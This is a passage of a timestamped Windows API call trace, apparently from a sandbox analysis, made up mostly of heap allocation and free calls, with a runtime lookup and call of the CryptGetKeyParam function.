lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0128.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0128.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0128.946] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0128.946] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0128.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0128.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0128.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0128.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0128.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0128.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0128.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0128.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0128.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0128.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0128.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0128.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0128.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0128.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0128.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0128.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0128.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0128.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0128.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0128.947] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0128.947] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0128.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0128.948] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0128.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0128.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0128.948] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0128.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0128.948] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0128.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0128.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0128.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0128.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0128.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0128.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0128.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0128.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0128.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0128.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0128.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0128.949] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0128.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0128.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0128.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0128.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0128.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0128.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0128.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0128.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0128.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0128.950] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0128.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0128.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0128.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0128.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0128.951] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0128.951] CryptGetKeyParam (in: hKey=0x41ac700, dwParam=0x7, pbData=0x43e2a60, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2a60*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0128.951] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0128.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0128.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0128.954] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0128.954] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0128.954] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0128.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0128.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0128.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 